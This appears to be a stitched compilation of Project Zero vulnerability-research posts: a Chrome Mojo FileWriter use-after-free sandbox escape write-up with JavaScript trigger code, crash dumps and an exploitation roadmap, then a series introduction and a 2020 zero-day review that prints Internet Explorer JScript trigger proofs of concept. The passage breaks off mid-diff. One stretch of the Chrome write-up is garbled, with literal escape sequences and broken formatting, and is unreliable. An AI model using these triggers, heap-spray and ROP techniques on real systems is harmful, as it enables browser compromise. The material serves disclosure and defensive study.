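  ~FileWriterModel() { g_live_writers.erase(this); }

  // Vulnerable shape: the continuation captures a raw `this`, which is exactly
  // what base::Unretained(this) expresses. Nothing ties it to the writer's
  // lifetime, so it runs even after the strong binding destroyed the writer.
  void WriteUnretained(Outcome* out) {
    FileWriterModel* self = this;
    GetInternalUuidAsync([self, out](const std::string& uuid) {
      if (g_live_writers.count(self) == 0) {
        *out = Outcome::kDanglingUse;  // real code would read freed memory here
        return;
      }
      self->DoWrite(uuid, out);
    });
  }

  // Hardened shape: the continuation holds a weak reference. Once the strong
  // binding has destroyed the writer, lock() fails and the reply is dropped.
  void WriteWeak(Outcome* out) {
    std::weak_ptr<FileWriterModel> weak(shared_from_this());
    GetInternalUuidAsync([weak, out](const std::string& uuid) {
      std::shared_ptr<FileWriterModel> self = weak.lock();
      if (!self) {
        *out = Outcome::kDroppedSafely;
        return;
      }
      self->DoWrite(uuid, out);
    });
  }

 private:
  // Models Blob::GetInternalUUID: the peer (a renderer-hosted Blob) answers on
  // a later turn of the sequence. Between posting and running, the peer can
  // close the FileWriter binding, which destroys the writer.
  void GetInternalUuidAsync(std::function<void(const std::string&)> reply) {
    seq_.Post([reply] { reply("aaaa"); });  // "aaaa": constructed UUID value
  }

  void DoWrite(const std::string& /*uuid*/, Outcome* out) { *out = Outcome::kWritten; }

  Sequence& seq_;
};

// Runs one Write request end to end. `peer_closes` models the renderer resetting
// its FileWriterPtr from inside the GetInternalUUID handler, which makes the
// strong binding free the writer before the reply is processed.
Outcome RunScenario(bool hardened, bool peer_closes) {
  Sequence seq;
  Outcome out = Outcome::kPending;
  auto writer = std::make_shared<FileWriterModel>(seq);  // the strong binding
  if (hardened) writer->WriteWeak(&out); else writer->WriteUnretained(&out);
  if (peer_closes) writer.reset();  // connection closed: writer is destroyed
  seq.RunAll();                     // the UUID reply now runs the continuation
  return out;
}

int main() {
  std::printf("unretained, peer closes: %d\n", static_cast<int>(RunScenario(false, true)));
  std::printf("weak, peer closes:       %d\n", static_cast<int>(RunScenario(true, true)));
  std::printf("weak, peer stays open:   %d\n", static_cast<int>(RunScenario(true, false)));
  return 0;
}
```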
The use of base::Unretained here would be dangerous regardless of this callback, but having it scheduled in this way makes it much cleaner to exploit.

## Step 1: A Trigger

First we need to actually reach the bug - this is a minimal trigger from Javascript using the MojoJS bindings we enabled earlier. A complete sample is attached to the bugtracker entry - the file is ‘trigger.js’.

```javascript
async function trigger() {
  // we need to know the UUID for a valid Blob
  let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
  Mojo.bindInterface(blink.mojom.BlobRegistry.name,
                     mojo.makeRequest(blob_registry_ptr).handle, "process");

  let bytes_provider = new BytesProviderImpl();
  let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();
  bytes_provider.binding.bind(mojo.makeRequest(bytes_provider_ptr));

  let blob_ptr = new blink.mojom.BlobPtr();
  let blob_req = mojo.makeRequest(blob_ptr);

  let data_element = new blink.mojom.DataElement();
  data_element.bytes = new blink.mojom.DataElementBytes();
  data_element.bytes.length = 1;
  data_element.bytes.embeddedData = [0];
  data_element.bytes.data = bytes_provider_ptr;

  await blob_registry_ptr.register(blob_req, 'aaaa', "text/html", "", [data_element]);

  // now we have a valid UUID, we can trigger the bug
  let file_system_manager_ptr = new blink.mojom.FileSystemManagerPtr();
  Mojo.bindInterface(blink.mojom.FileSystemManager.name,
                     mojo.makeRequest(file_system_manager_ptr).handle, "process");

  let host_url = new url.mojom.Url();
  host_url.url = window.location.href;

  let open_result = await file_system_manager_ptr.open(host_url, 0);

  let file_url = new url.mojom.Url();
  file_url.url = open_result.rootUrl.url + '/aaaa';

  let file_writer = (await file_system_manager_ptr.createWriter(file_url)).writer;

  function BlobImpl() {
    this.binding = new mojo.Binding(blink.mojom.Blob, this);
  }

  BlobImpl.prototype = {
    getInternalUUID: async (arg0) => {
      // here we free the FileWriterImpl in the callback
      create_writer_result.writer.ptr.reset();

      return {'uuid': 'aaaa'};
    }
  };

  let blob_impl = new BlobImpl();
  let blob_impl_ptr = new blink.mojom.BlobPtr();
  blob_impl.binding.bind(mojo.makeRequest(blob_impl_ptr));

  file_writer.write(0, blob_impl_ptr);
}
```

## Step 2: Replacement

Although it’s likely not to be of much use in the end, I usually like to start the process of exploiting a use-after-free by replacing the object with completely attacker-controlled data. Without an ASLR bypass or an information leak it’s unlikely we can do anything useful with this primitive, but it’s often useful to get an understanding of the allocation patterns around the object involved, and it gives a clear crash that’s useful to demonstrate the likely exploitability of the issue.

On the Windows build that we’re looking at, the size of the FileWriterImpl is 0x140 bytes. I originally looked at using the Javascript Blob API directly to create allocations, but this causes a number of additional temporary allocations of the same size, which significantly reduces reliability. A better way to cause allocations of a controlled size with controlled data in the browser process is to register new Blobs using the BlobRegistry registerFromStream method - this will perform all of the secondary allocations during the initial call to registerFromStream, and we can then trigger a single allocation of the desired size and contents later by writing data into the DataPipeProducerHandle.

We can test this (see ‘trigger_replace.js’), and indeed it does reliably replace the free’d object with a buffer containing completely controlled bytes, and crashes in the way we’d expect:

```
(1594.226c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chrome!storage::FileSystemOperationRunner::GetMetadata+0x33:
00007ffc`362a1a99 488b4908        mov     rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????
0:002> r
rax=0000ce61f98b376e rbx=0000021b30eb4bd0 rcx=2323232323232323
rdx=0000021b30eb4bd0 rsi=0000005ae4ffe3e0 rdi=2323232323232323
rip=00007ffc362a1a99 rsp=0000005ae4ffe2f0 rbp=0000005ae4ffe468
 r8=0000005ae4ffe35c  r9=0000005ae4ffe3e0 r10=0000021b30badbf0
r11=0000000000000000 r12=0000000000000000 r13=0000005ae4ffe470
r14=0000000000000001 r15=0000005ae4ffe3e8
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
chrome!storage::FileSystemOperationRunner::GetMetadata+0x33:
00007ffc`362a1a99 488b4908        mov     rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????
0:002> k
 # Child-SP          RetAddr           Call Site
00 0000005a`e4ffe2f0 00007ffc`362a74ed chrome!storage::FileSystemOperationRunner::GetMetadata+0x33
01 0000005a`e4ffe3a0 00007ffc`362a7aef chrome!storage::FileWriterImpl::DoWrite+0xed
…
```

## Step 3: Information Leak

It’s not much use controlling the data in the free’d object when we need to be able to put valid pointers in there - so at this point we need to consider how the free’d object is used, and what options we have for replacing the free’d object with a different type of object, essentially turning the use-after-free into a type-confusion in a way that will achieve something useful to us.

Looking through objects of the same size in windbg however did not provide any immediate answers - and since most of the methods being called from DoWrite are non-virtual, we actually need quite a large amount of structure to be correct in the replacing object.

```cpp
void FileWriterImpl::DoWrite(WriteCallback callback,
                             uint64_t position,
                             std::unique_ptr<BlobDataHandle> blob) {
  if (!blob) {
    std::move(callback).Run(base::File::FILE_ERROR_FAILED, 0);
    return;
  }
  // FileSystemOperationRunner assumes that positions passed to Write are always
  // valid, and will NOTREACHED() if that is not the case, so first check the
  // size of the file to make sure the position passed in from the renderer is
  // in fact valid.
  // Of course the file could still change between checking its size and the
  // write operation being started, but this is at least a lot better than the
  // old implementation where the renderer only checks against how big it thinks
  // the file currently is.
  operation_runner_->GetMetadata(
      url_, FileSystemOperation::GET_METADATA_FIELD_SIZE,
      base::BindRepeating(&FileWriterImpl::DoWriteWithFileInfo,
                          base::Unretained(this),
                          base::AdaptCallbackForRepeating(std::move(callback)),
                          position, base::Passed(std::move(blob))));
}
```

So; we’re going to make a non-virtual call to [FileSystemOperationRunner::GetMetadata](<https://chromium.googlesource.com/chromium/src/+/d755a8cf625f40b2b2a4c7e96adb8337b135aa68/storage/browser/fileapi/file_system_operation_runner.cc#174>) with a this pointer taken from inside the free’d object:

```cpp
OperationID FileSystemOperationRunner::GetMetadata(
    const FileSystemURL& url,
    int fields,
    GetMetadataCallback callback) {
  base::File::Error error = base::File::FILE_OK;
  std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(
      file_system_context_->CreateFileSystemOperation(url, &error));
  ...
}
```

And that will then make a non-virtual call to [FileSystemContext::CreateFileSystemOperation](<https://chromium.googlesource.com/chromium/src/+/1606ab8b04ea62cdbd4243414936168971d6a677/storage/browser/fileapi/file_system_context.cc#524>) with a this pointer taken from inside whatever the previous this pointer pointed to…

```cpp
FileSystemOperation* FileSystemContext::CreateFileSystemOperation(
    const FileSystemURL& url, base::File::Error* error_code) {
  ...

  FileSystemBackend* backend = GetFileSystemBackend(url.type());
  if (!backend) {
    if (error_code)
      *error_code = base::File::FILE_ERROR_FAILED;
    return nullptr;
  }

  ...
}
```

Which will then finally expect to be able to look up a FileSystemBackend pointer from an std::map contained inside it!

```cpp
FileSystemBackend* FileSystemContext::GetFileSystemBackend(
    FileSystemType type) const {
  auto found = backend_map_.find(type);
  if (found != backend_map_.end())
    return found->second;
  NOTREACHED() << "Unknown filesystem type: " << type;
  return nullptr;
}
```

This is quite a comprehensive set of constraints. (If we can meet them all, the call to backend->CreateFileSystemOperation is finally a virtual call, which would be where we’d hope to achieve a useful side-effect.)

After looking through the types of the same size (0x140 bytes), nothing jumped out as being both easy to allocate in a controlled way, and also overlapping in a compatible way - so we can instead consider an alternative approach.
On Windows, the freeing of a heap block doesn\u2019t (immediately) corrupt the data it contains - so if we can groom to make sure that the FileWriterImpl allocation isn\u2019t reused, we can instead replace the FileSystemOperationRunner object directly, and access it through the stale pointer. This reduces one dereference from our constraints, and means we are looking in a different size class (0x80 bytes)\u2026 There are roughly 1000 object types of this size, and again nothing is obviously useful, so maybe we can consider alternative solutions...\n\n## Step 4: Information Leak (round #2)\n\nTired of staring at structure layouts in the debugger, time to consider any alternative we could come up with. The ASLR implementation on Windows means that if the same library is loaded in multiple processes, it will be at the same base address; so any library loaded in the renderer will be loaded at a known address in the browser process.\n\n** \n**\n\nThere are a few objects we could replace the FileSystemOperationRunner with that would line up the FileSystemContext pointer to controlled string data; we could use this to fake the first/begin node of the backend_map_ with a pointer into the data section of one of the modules that we can locate, and there line things up correctly so that we could lookup the first entry. This only required an even smaller set of constraints:\n\n** \n**\n\nptr = getPtr(address)\n\n** \n**\n\ngetUint8(ptr + 0x19) == 0\n\ngetUint32(ptr + 0x20) == 0\n\nobj = getPtr(ptr + 0x28)\n\n** \n**\n\nvtable = getPtr(obj)\n\n** \n**\n\nfunction = getPtr(vtable + 0x38)\n\n** \n**\n\nThe set of addresses which meet these constraints, unfortunately, does not really produce any useful primitives.\n\n## Step 5: ASLR Bypass\n\nHaving almost completely given up, we remembered one of the quirks related to [issue 1642](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1642>), a bug in the Mojo core code. 
Specifically; when the receiving end of a Mojo connection receives a [DataPipe*Dispatcher](<https://chromium.googlesource.com/chromium/src/+/66e24a8793615bd9d5c238b1745b093090e1f72d/mojo/core/data_pipe_consumer_dispatcher.cc#361>) object, it will immediately map an associated shared memory section (the mapping occurs inside the call to InitializeNoLock).\n\n** \n**\n\nSince there\u2019s no memory or virtual address space limit in the browser process, this suggests that in fact, we may be able to completely bypass ASLR without an information leak if we can simply spray the virtual address space of the browser with shared memory mappings. Note - the renderer limits will still be applied, so we need to find a way to do this without exceeding the renderer limits. This should be fairly trivial from native code running in the renderer; we can simply duplicate handles to the same shared memory page, and repeatedly send them - but it would be nice to stay in Javascript.\n\n** \n**\n\nLooking into the IDL for the MojoHandle interface in MojoJS bindings, we can note that while we can\u2019t clone DataPipe handles, we can clone SharedBuffer handles. 
\n\n** \n**\n\ninterface MojoHandle {\n\n...\n\n// TODO(alokp): Create MojoDataPipeProducerHandle and MojoDataPipeConsumerHandle,\n\n// subclasses of MojoHandle and move the following member functions.\n\nMojoWriteDataResult writeData(BufferSource buffer, optional MojoWriteDataOptions options);\n\nMojoReadDataResult queryData();\n\nMojoReadDataResult discardData(unsigned long numBytes, optional MojoDiscardDataOptions options);\n\nMojoReadDataResult readData(BufferSource buffer, optional MojoReadDataOptions options);\n\n** \n**\n\n// TODO(alokp): Create MojoSharedBufferHandle, a subclass of MojoHandle\n\n// and move the following member functions.\n\nMojoMapBufferResult mapBuffer(unsigned long offset, unsigned long numBytes);\n\nMojoCreateSharedBufferResult duplicateBufferHandle(optional MojoDuplicateBufferHandleOptions options);\n\n};\n\n** \n**\n\nUnfortunately, SharedBuffers are used much less frequently in the browser process interfaces, and they\u2019re not automatically mapped when they are deserialized, so they\u2019re less useful for our purposes. However, since both SharedBuffers and DataPipes are backed by the same operating-system level primitives, we can still use this to our advantage; by creating an equal number of DataPipes with small shared memory mappings, and clones of a single, large SharedBuffer, we can then use our arbitrary read-write to swap the backing buffers!\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGINNa4nXPogImlula6gigQKMHTIoOV5_8LYW0oI1VoOYDkC5N81NhWpe3oUBZ3iDTjWFbZdzs5YaR-7uY6QprDITF2eMsYgjwR3kDuXbW434rGorpoLwqnx4-9syDXlO3b5T5umb1EuSjQycICzI7Yz_H0evwdx-GBDxm8S7Vk1jq8G8eePgLDXSi/s1267/image1.png>)\n\nAs we can see in the VMMap screenshot above - this is both effective and quick! The first test performed a 16-terabyte spray, which got a bit laggy, but in the real-world about 3.5-terabytes appears sufficient to get a reliable, predictable address. 
Finally, a chance to cite SkyLined’s exploit for [MS04-040](<https://www.exploit-db.com/exploits/612>) in a modern 64-bit Chrome exploit!

A little bit of fiddling later:

```text
rax=00000404040401e8 rbx=000001fdba193480 rcx=00000404040401e8
rdx=000001fdba193480 rsi=00000002f39fe97c rdi=00000404040400b0
rip=00007ffd87270258 rsp=00000002f39fe8c0 rbp=00000002f39fea88
 r8=00000404040400b0  r9=00000002f39fe8e4 r10=00000404040401f0
r11=0000000000000000 r12=0000000000000000 r13=00000002f39fea90
r14=0000000000000001 r15=00000002f39fea08
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
chrome!storage::FileSystemContext::CreateFileSystemOperation+0x4c:
00007ffd`87270258 41ff5238        call    qword ptr [r10+38h] ds:00000404`04040228=4141414141414141
```

## Roadmap

Ok, at this point we should have all the heavy machinery that we need; the rest is a matter of engineering. For the detail-oriented, you can find a full, working exploit in the bugtracker, and you should be able to identify the code handling all of the following stages of the exploit:

 1. Arbitrary read-write in the renderer
    a. Enable MojoJS bindings
    b. Launch sandbox escape
 2. Sandbox escape
    a. Arbitrary read-write in the renderer (again…)
    b. Locate necessary libraries for pivots and ROP chain in the renderer address space
    c. Build a page of data that we’re going to spray in the browser address space containing fake FileSystemOperationRunner, FileSystemContext, FileSystemBackend objects
    d. Trigger the bug
    e. Replace the free’d FileWriterImpl with a fake object that uses the address that we’ll target with our spray as the FileSystemOperationRunner pointer
    f. Spray ~4tb of copies of the page we built in 2c into the browser process address space
    g. Return from the renderer to FileWriterImpl::DoWrite in the browser process, pivoting into our ROP chain and payload
    h. Pop calc
    i. Clean things up so that the browser can continue running

## Conclusions

It’s interesting to have another case where we’ve been able to use weaknesses in ASLR implementations to achieve a working exploit without needing an information leak.

There were two key ASLR weaknesses that enabled reliable exploitation of this bug:

 * No inter-process randomisation on Windows (which is also a limitation on MacOS/iOS), which enabled locating valid code addresses in the target process without an information leak.
 * No limitations on address-space usage in the Chrome Browser Process, which enabled predicting valid data addresses in the heap spray.

Without both of these primitives, it would be more difficult to exploit this vulnerability, and would likely have pushed past available motivation (better to keep looking for a better vulnerability, or an additional information leak, since the use-after-free wasn’t readily usable as an information leak).

Source record: [Virtually Unlimited Memory: Escaping the Chrome Sandbox](<https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html>), Project Zero, published 2019-04-11, CVE-2019-5782.

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.

At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community’s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).

Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild.
Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.

We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>)

From the exploit servers, we have extracted:

 * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
 * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
 * A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.

The four 0-days discovered in these chains have been fixed by the appropriate vendors:

 * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) - Chrome Vulnerability in TurboFan (fixed February 2020)
 * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) - Font Vulnerability on Windows (fixed April 2020)
 * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) - Font Vulnerability on Windows (fixed April 2020)
 * [CVE-2020-1027](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1027.html>) - Windows CSRSS Vulnerability (fixed April 2020)

We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end user's device before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the "fast" or "slow" exploitation paths.

The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.

The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:

 * Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
 * A deep look into the bug class of one of the Chrome exploits, and
 * An in-depth teardown of the Android post-exploitation code.

In addition, we are posting [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) for each of the four 0-days discovered as a part of these exploit chains.

Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well-resourced exploitation teams are doing in the real world) and what is publicly known.

We recommend reading the posts in the following order:

 1. Introduction (this post)
 2. [Chrome: Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)
 3. [Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>)
 4. [Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>)
 5. [Android Post-Exploitation](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>)
 6. [Windows Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html>)

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild.
To continue reading, see [In The Wild Part 2: Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).

Source record: [Introducing the In-the-Wild Series](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>), Project Zero, published 2021-01-12, CVE-2020-0938, CVE-2020-1020, CVE-2020-1027, CVE-2020-6418.

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in.
While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>).

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

# This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. 6 of the 24 0-day exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days is related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.

| Product | Vulnerability exploited in-the-wild | Variant of... |
|---|---|---|
| Microsoft Internet Explorer | CVE-2020-0674 | CVE-2018-8653*, CVE-2019-1367*, CVE-2019-1429* |
| Mozilla Firefox | CVE-2020-6820 | Mozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>) |
| Google Chrome | CVE-2020-6572 | CVE-2019-5870, CVE-2019-13695 |
| Microsoft Windows | CVE-2020-0986 | CVE-2019-0880* |
| Google Chrome/Freetype | CVE-2020-15999 | CVE-2014-9665 |
| Apple Safari | CVE-2020-27930 | CVE-2015-0093 |

\* vulnerability was also exploited in-the-wild in previous years

## Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability that’s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google’s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating: the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy JavaScript engine in Internet Explorer. While it’s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.

### CVE-2018-8653

In December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the `this` variable is not tracked by the garbage collector in the isPrototypeOf callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>).

```javascript
var objs = new Array();
var refs = new Array();
var dummyObj = new Object();

function getFreeRef()
{
  // 5. delete prototype objects as well as ordinary objects
  for ( var i = 0; i < 10000; i++ ) {
    objs[i] = 1;
  }
  CollectGarbage();
  for ( var i = 0; i < 200; i++ )
  {
    refs[i].prototype = 1;
  }
  // 6. Garbage collector frees unused variable blocks.
  // This includes the one holding the "this" variable
  CollectGarbage();
  // 7. Boom
  alert(this);
}

// 1. create "special" objects for which isPrototypeOf can be invoked
for ( var i = 0; i < 200; i++ ) {
  var arr = new Array({ prototype: {} });
  var e = new Enumerator(arr);
  refs[i] = e.item();
}

// 2. create a bunch of ordinary objects
for ( var i = 0; i < 10000; i++ ) {
  objs[i] = new Object();
}

// 3. create objects to serve as prototypes and set up callbacks
for ( var i = 0; i < 200; i++ ) {
  refs[i].prototype = {};
  refs[i].prototype.isPrototypeOf = getFreeRef;
}

// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable
// During callback, the "this" variable won't be tracked by the Garbage collector
// use different index if this doesn't work
dummyObj instanceof refs[100];
```

### CVE-2019-1367

In September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though, the variables that are not tracked are in the arguments array in the Array.sort callback.

```javascript
var spray = new Array();

function F() {
  // 2. Create a bunch of objects
  for (var i = 0; i < 20000; i++) spray[i] = new Object();
  // 3. Store a reference to one of them in the arguments array
  // The arguments array isn't tracked by garbage collector
  arguments[0] = spray[5000];
  // 4. Delete the objects and call the garbage collector
  // All JScript variables get reclaimed...
  for (var i = 0; i < 20000; i++) spray[i] = 1;
  CollectGarbage();
  // 5. But we still have reference to one of them in the
  // arguments array
  alert(arguments[0]);
}

// 1. Call sort with a custom callback
[1,2].sort(F);
```

### CVE-2019-1429

The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in-the-wild.
The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied!

In November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 patch and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJSON callback rather than the Array.sort callback. The only difference between the variant triggers is the marked lines: instead of calling the Array.sort callback, we call the toJSON callback.

```diff
var spray = new Array();

function F() {
// 2. Create a bunch of objects
for (var i = 0; i < 20000; i++) spray[i] = new Object();
// 3. Store a reference to one of them in the arguments array
// The arguments array isn't tracked by garbage collector
arguments[0] = spray[5000];
// 4. Delete the objects and call the garbage collector
// All JScript variables get reclaimed...
for (var i = 0; i < 20000; i++) spray[i] = 1;
CollectGarbage();
// 5. But we still have reference to one of them in the
// arguments array
alert(arguments[0]);
}

+ // 1. Cause toJSON callback to fire
+ var o = {toJSON:F}
+ JSON.stringify(o);
- // 1. Call sort with a custom callback
- [1,2].sort(F);
```

### CVE-2020-0674

In January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only change required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

```diff
var spray = new Array();

+ function F(arg1, arg2) {
- function F() {
// 2. Create a bunch of objects
